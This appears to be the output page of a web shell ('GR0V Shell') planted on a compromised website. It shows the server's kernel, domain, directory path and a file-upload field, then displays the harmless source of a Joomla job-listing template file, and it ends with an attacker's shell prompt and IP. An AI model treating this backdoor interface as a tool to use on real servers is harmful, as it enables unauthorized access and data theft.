? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/promice/components/com_jsjobs/views/resume/tmpl/
File Upload :
Current File : /home/admin/public_html/old/promice/components/com_jsjobs/views/resume/tmpl/resumeview.php

<?php
/**
 + Created by:	Ahmad Bilal
 * Company:		Al-Barr Technologies
 + Contact:		www.al-barr.com , info@al-barr.com
 * Created on:	Jan 11, 2009
 ^
 + Project: 		Job Posting and Employment Application
 * File Name:	views/application/tmpl/empview.php
 ^ 
 * Description: template view for a employment application
 ^ 
 * History:		NONE
 ^ 
 */
 
 defined('_JEXEC') or die('Restricted access');
 global $mainframe;
 

?>

<link rel="stylesheet" type="text/css" media="all" href="<?php echo $mainframe->getBasePath(); ?>components/com_jsjobs/css/<?php echo $this->config['theme']; ?>" />
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="contentpane">
	<tr><td valign="top" class="<?php echo $this->theme['title']; ?>" >	
		<?php echo $this->config['title']; ?>
	</td>
	</tr>
	<tr><td height="23"></td></tr>
	<tr><td height="13"></td></tr>
	<tr><td class="<?php echo $this->theme['heading']; ?>" align="center">
		<?php echo JText::_('JP_VIEW_EMP_APP'); ?>
	</td></tr>
	<tr><td height="3"></td></tr>
</table>

	<table cellpadding="0" cellspacing="0" border="0" width="100%" class="contentpane">
      <tr ><td width="5%">&nbsp;</td>
        <td class="maintext" ><b><?php echo $this->application->resume; ?></b></td>
      </tr>
	  
</table>



T1KUS90T
  root-grov@210.1.60.28:~$